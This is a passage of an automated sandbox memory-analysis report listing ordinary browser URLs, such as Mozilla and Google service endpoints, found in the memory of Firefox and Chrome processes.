Source: firefox.exe, 0000001E.00000003.2788970863.0000019DE7933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2791840293.0000019DE7930000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2792089306.0000019DE7930000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3365411007.0000024F7375F000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3334863235.0000024F70703000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001E.00000003.2788970863.0000019DE7933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2791840293.0000019DE7930000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2792089306.0000019DE7930000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3365411007.0000024F7375F000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 0000001E.00000003.2786740270.0000019DE583C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2787450056.0000019DE5877000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2785045981.0000019DE7B00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2786290787.0000019DE581F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2787260190.0000019DE585A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: chrome.exe, 00000022.00000002.2913205632.000027A00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2854101451.000027A00039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2853190823.000027A000390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 00000022.00000002.2913205632.000027A00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2854101451.000027A00039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2853190823.000027A000390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 00000022.00000002.2927818940.00006DEC0000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2938535672.00006DEC001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 00000021.00000002.2898025949.00000139662C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3219423651.0000024F6FBAC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://install.mozilla.org
Source: chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3013036669.00006DEC00B98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/161903006
Source: chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3013036669.00006DEC00B98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/166809097
Source: chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3013036669.00006DEC00B98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/184850002
Source: chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3013036669.00006DEC00B98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/187425444
Source: chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3013036669.00006DEC00B98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/220069903
Source: chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3013036669.00006DEC00B98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/229267970
Source: chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3013036669.00006DEC00B98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/250706693
Source: chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3013036669.00006DEC00B98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/253522366
Source: chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3013036669.00006DEC00B98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/255411748
Source: chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3013036669.00006DEC00B98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/258207403
Source: chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3013036669.00006DEC00B98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/274859104
Source: chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3013036669.00006DEC00B98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/284462263
Source: chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: chrome.exe, 00000022.00000002.2999783272.00006DEC004C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3006058560.00006DEC0081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3005873380.00006DEC0080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
Source: chrome.exe, 00000022.00000002.2999783272.00006DEC004C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3006058560.00006DEC0081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3005873380.00006DEC0080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
Source: chrome.exe, 00000022.00000003.2854101451.000027A00039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010114860.00006DEC00A3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2853190823.000027A000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2912463411.000027A000770000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2
Source: chrome.exe, 00000022.00000002.2910946801.000027A000237000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010114860.00006DEC00A3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2912463411.000027A000770000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboard
Source: chrome.exe, 00000022.00000002.2913205632.000027A00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2854101451.000027A00039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2853190823.000027A000390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
Source: chrome.exe, 00000022.00000002.2913205632.000027A00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2854101451.000027A00039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2853190823.000027A000390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
Source: chrome.exe, 00000022.00000003.2854101451.000027A00039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010114860.00006DEC00A3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2853190823.000027A000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2912463411.000027A000770000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiments
Source: chrome.exe, 00000022.00000002.2913205632.000027A00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2854101451.000027A00039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2853190823.000027A000390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/2
Source: chrome.exe, 00000022.00000003.2858643495.000027A0006E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2912413617.000027A000744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2912637888.000027A00078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2859206602.000027A0006E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 00000022.00000003.2854101451.000027A00039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2853190823.000027A000390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/upload2
Source: chrome.exe, 00000022.00000002.2912413617.000027A000744000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadcompanion-iph-blocklisted-page-urlsexps-registration-success-page-u
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 0000001E.00000003.2788970863.0000019DE7933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2791840293.0000019DE7930000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2792089306.0000019DE7930000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3365411007.0000024F7375F000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: chrome.exe, 00000022.00000002.2998024266.00006DEC0038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872705809.00006DEC006BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2998389906.00006DEC00412000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: firefox.exe, 0000001E.00000003.2788970863.0000019DE7933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2791840293.0000019DE7930000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2792089306.0000019DE7930000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3365411007.0000024F7375F000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3334863235.0000024F70703000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 0000001E.00000003.2788970863.0000019DE7933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2791840293.0000019DE7930000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2792089306.0000019DE7930000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3365411007.0000024F7375F000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3334863235.0000024F70703000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 00000021.00000002.2898025949.0000013966286000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3317267748.0000024F701E2000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3127317780.0000024F644DA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: chrome.exe, 00000022.00000002.2996028481.00006DEC002F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3008457453.00006DEC009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3008634598.00006DEC009E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3008634598.00006DEC009EB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2999305578.00006DEC0049C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myactivity.google.com/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: chrome.exe, 00000022.00000002.3018272883.00006DEC00DD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3019936970.00006DEC00EA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3017810792.00006DEC00DA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000022.00000002.3020042262.00006DEC00EAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3018272883.00006DEC00DD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3019936970.00006DEC00EA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3017810792.00006DEC00DA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 00000022.00000002.3018272883.00006DEC00DD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 00000022.00000002.3018272883.00006DEC00DD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3019936970.00006DEC00EA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2995695157.00006DEC002C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000022.00000002.3018272883.00006DEC00DD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2995695157.00006DEC002C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000022.00000002.3018272883.00006DEC00DD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3019936970.00006DEC00EA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000022.00000002.3018272883.00006DEC00DD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2881703204.00006DEC006BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3019936970.00006DEC00EA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3017810792.00006DEC00DA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 00000022.00000002.3018272883.00006DEC00DD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3019936970.00006DEC00EA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3017810792.00006DEC00DA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=4&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000022.00000002.2999783272.00006DEC004C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: firefox.exe, 0000001E.00000003.2788970863.0000019DE7933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2791840293.0000019DE7930000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2792089306.0000019DE7930000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3365411007.0000024F7375F000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: chrome.exe, 00000022.00000002.2996028481.00006DEC002F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3008457453.00006DEC009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3008634598.00006DEC009E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3008634598.00006DEC009EB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2999305578.00006DEC0049C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 0000001E.00000003.2788970863.0000019DE7933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2791840293.0000019DE7930000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2792089306.0000019DE7930000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3365411007.0000024F7375F000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3334863235.0000024F70703000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: chrome.exe, 00000022.00000002.3008457453.00006DEC009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3008634598.00006DEC009E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3008634598.00006DEC009EB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2999305578.00006DEC0049C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://policies.google.com/
